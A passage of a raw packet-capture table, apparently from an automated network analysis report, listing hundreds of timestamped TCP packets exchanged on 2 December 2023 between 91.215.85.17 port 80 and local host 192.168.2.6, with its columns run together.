                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.472002983 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.472039938 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.472105980 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.472110033 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.472145081 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.472151041 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.472182035 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.472220898 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.472233057 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.472258091 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.472292900 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.472302914 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.472332954 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.472368956 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.472377062 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.472407103 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.472441912 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.472453117 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.472479105 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.472517967 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.472524881 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.472553968 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.472594023 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.472601891 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.472634077 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.472668886 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.472678900 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.472704887 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.472739935 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.472753048 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.472779036 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.472814083 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.472820044 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.472851038 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.472893000 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.472966909 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.473006010 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.473041058 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.473050117 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.473076105 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.473113060 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.473119974 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.473149061 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.473185062 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.473196983 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.473221064 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.473259926 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.473284960 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.473323107 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.473357916 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.473367929 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.473395109 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.473428965 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.473437071 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.473464012 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.473499060 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.473505974 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.473534107 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.473570108 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.473577023 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.473609924 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.473649025 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.473654985 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.473684072 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.473721027 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.473727942 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.473757982 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.473793030 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.473799944 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.473829031 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.473864079 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.473869085 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.473901033 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.473936081 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.473943949 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.473972082 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.474009037 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.474015951 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.474044085 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.474078894 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.474087000 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.474114895 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.474149942 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.474158049 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.474189043 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.474224091 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.474229097 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.474261999 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.474298954 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.474308014 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.474335909 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.474370956 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.474379063 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.474406004 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.474442005 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.474452972 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.474478006 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.474512100 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.474519968 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.474550009 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.474585056 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.474596024 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.474621058 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.474657059 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.474664927 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.474694014 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.474733114 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.474735975 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.474771023 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.474806070 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.474812031 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.474842072 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.474877119 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.474889040 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.474911928 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.474951029 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.474957943 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.474986076 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.475022078 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.475027084 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.475059032 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.475095987 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.475106955 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.475131989 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.475168943 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.475177050 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.475204945 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.475239992 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.475245953 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.475275993 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.475315094 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.475322962 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.475354910 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.475390911 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.475402117 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.475426912 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.475466013 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.475474119 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.475502014 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.475538015 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.475544930 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.475574017 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.475609064 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.475615978 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.475647926 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.475687027 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.475693941 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.475724936 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.475763083 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.475770950 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.475799084 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.475833893 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.475842953 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.475869894 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.475904942 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.475912094 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.475941896 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.475975990 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.475984097 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.476011992 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.476049900 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.476056099 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.476085901 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.476120949 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.476129055 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.476157904 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.476192951 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.476198912 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.476229906 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.476265907 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.476272106 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.476301908 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.476340055 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.476346016 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.476376057 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.476411104 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.476422071 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.476445913 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.476481915 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.476499081 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.476517916 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.476555109 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.476562977 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.476593018 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.476629019 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.476634979 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.476664066 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.476700068 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.476706982 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.476737022 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.476772070 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.476779938 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.476808071 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.476843119 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.476850033 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.476880074 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.476914883 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.476922035 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.476955891 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.476990938 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.476998091 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.477026939 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.477066040 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.477073908 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.477103949 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.477138996 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.477149963 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.477174997 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.477210999 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.477219105 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.477267027 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.477303028 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.477308989 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.477340937 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.477380991 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.477389097 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.477416039 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.477451086 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.477459908 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.477488041 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.477524996 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.477531910 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.477561951 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.477597952 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.477605104 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.477633953 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.477669001 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.477674007 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.477705956 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.477742910 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.477756977 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.477785110 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.477819920 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.477827072 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.477854967 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.477890968 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.477897882 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.477926016 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.477961063 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.477963924 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.477997065 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.478034019 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.478039980 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.478070021 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.478105068 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.478111029 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.478142977 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.478178024 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.478187084 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.478213072 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.478249073 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.478256941 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.478286028 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.478322029 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.478332043 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.478358984 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.478396893 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.478404045 CET4972080192.168.2.691.215.85.17
